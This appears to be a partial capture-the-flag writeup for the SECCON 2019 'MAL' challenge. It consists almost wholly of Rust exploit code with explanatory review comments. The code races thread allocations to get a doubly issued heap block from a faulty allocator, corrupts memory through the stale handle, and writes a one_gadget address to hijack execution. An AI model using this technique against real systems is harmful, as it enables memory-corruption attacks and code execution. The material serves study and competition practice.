@megumish
Created October 20, 2019 08:30
SECCON 2019 Online MAL partial writeup
extern crate mal;
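/// Sleeps for one millisecond, then returns a freshly boxed, zero-filled `[u64; 20]`.
///
/// `f` runs this on a spawned thread and compares the address of the returned
/// box with a same-sized box allocated on the calling thread.
// NOTE(review): the delay presumably lines this allocation up in time with the
// caller's own allocations; the page does not say so, confirm.
fn nyan() -> Box<[u64; 20]> {
    // `std::thread::sleep_ms` is deprecated; `sleep(Duration::from_millis(1))`
    // is the equivalent supported call.
    std::thread::sleep(std::time::Duration::from_millis(1));
    Box::new([0u64; 20])
}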
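/// Takes ownership of a boxed `[u64; 16]`, sleeps for one millisecond and returns.
///
/// The box is never read; its allocation has been released by the time the
/// call returns. Nothing else in the listing calls this function.
fn nyan2(_: Box<[u64; 16]>) {
    // `std::thread::sleep_ms` is deprecated; `sleep(Duration::from_millis(1))`
    // is the equivalent supported call.
    std::thread::sleep(std::time::Duration::from_millis(1));
}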
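/// Sleeps for one millisecond, then returns a freshly boxed, zero-filled `[u64; 16]`.
///
/// Same shape as `nyan` with a 16-element array; nothing else in the listing
/// calls this function.
fn nyan3() -> Box<[u64; 16]> {
    // `std::thread::sleep_ms` is deprecated; `sleep(Duration::from_millis(1))`
    // is the equivalent supported call.
    std::thread::sleep(std::time::Duration::from_millis(1));
    Box::new([0u64; 16])
}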
/// Heap-layout demonstration from the writeup; always returns the literal `"A"`.
///
/// What the visible code does, in order:
/// 1. Derives `addr` from the address of a one-byte `Vec` element plus a fixed
///    adjustment.
/// 2. Loops, allocating `[u64; 20]` boxes on this thread while a spawned thread
///    allocates one through `nyan`, until two boxes that are alive at the same
///    time report the same address.
/// 3. Keeps one of the two aliasing boxes (`vec1`), makes further allocations of
///    assorted sizes, and writes `addr`-derived values through `vec1` and
///    through a later box.
///
/// NOTE(review): step 2 can only terminate if the global allocator hands the
/// same block to two threads. A sound `GlobalAlloc` never returns overlapping
/// live allocations, so with a correct allocator this loop spins forever; the
/// function is in effect a probe for missing synchronisation in the allocator
/// in use — presumably the one supplied by the `mal` crate, whose source is not
/// shown on this page (confirm). Everything after the loop relies on that
/// broken invariant: it is a write through a stale handle in code that contains
/// no `unsafe`.
///
/// Every hex offset below is specific to the challenge environment and is not
/// explained on the page.
fn f() -> &'static str{
// One-byte Vec, used only to obtain a heap address.
let mut a = Vec::<u8>::new();
a.push(0);
let addr: *const u8 = &a[0];
// Fixed adjustment of that heap address. What the result refers to is not
// shown on the page — TODO confirm.
let addr = addr as u64 + 0x200000 - 0x10;
// Repeat until the child's box and this thread's box share an address.
let mut vec1 = loop {
// The child thread sleeps 1 ms and then allocates a `[u64; 20]` box.
let child = std::thread::spawn(move || nyan());
// This thread sleeps 1 ms as well, then makes same-sized allocations of its own.
std::thread::sleep_ms(1);
let mut vec1 = Box::new([0x0u64; 20]);
let mut vec_extra = Box::new([0x0u64; 20]);
// Box allocated by the child; it stays alive until this iteration ends.
let mut vec2 = child.join().unwrap();
let addr_vec1: *const u64 = &vec1[0];
let addr_vec2: *const u64 = &vec2[0];
// Both boxes are still alive here, so equal addresses mean the allocator
// returned the same block twice.
if addr_vec1 as u64 == addr_vec2 as u64 {
// `vec1` leaves the loop; `vec2` and `vec_extra` are dropped (freed) as the
// iteration ends, so `vec1` now refers to a block the allocator has been
// told is free.
break vec1
}
};
// Allocations of assorted sizes. Shadowing a binding does not drop the earlier
// box: each of these stays allocated until `f` returns. The page does not
// explain the choice of sizes.
let vec2 = Box::new([0x0u64; 4]);
let vec2 = Box::new([0x0u64; 6]);
let vec2 = Box::new([0x0u64; 4]);
let vec2 = Box::new([0x0u64; 10]);
let vec2 = Box::new([0x0u64; 2]);
let vec2 = Box::new([0x0u64; 2]);
let vec2 = Box::new([0x0u64; 1]);
{
// This one-element box is freed when the inner block ends.
let vec2 = Box::new([0x0u64; 1]);
// Write through the stale `vec1` handle: the first word of the doubly-issued
// block is overwritten with an `addr`-relative value.
vec1[0] = addr + 0x3ed883;
}
// Three more allocations; only the last (28 elements) is written to.
let vec2 = Box::new([0x0u64; 20]);
let vec2 = Box::new([0x0u64; 20]);
let mut vec2 = Box::new([0x0u64; 28]);
// Split the low 48 bits of `addr + 0x10a38c` in two: bits 24..47 moved down to
// bits 0..23, and bits 0..23 moved up to bits 40..63.
let one_gadget1 = ((addr + 0x10a38c) & 0xffffff000000) >> (8 * 3);
let one_gadget2 = ((addr + 0x10a38c) & 0xffffff) << (8 * 5);
// Stored in adjacent elements. On a little-endian target (assumed, not stated
// on the page) the 48-bit value then occupies six consecutive bytes that
// straddle elements 10 and 11.
vec2[11] = one_gadget1;
vec2[10] = one_gadget2;
// The return value carries no information; callers ignore it.
"A"
}
/// Program entry point: runs `f` once and discards the string it returns.
fn main() {
    let _ = f();
}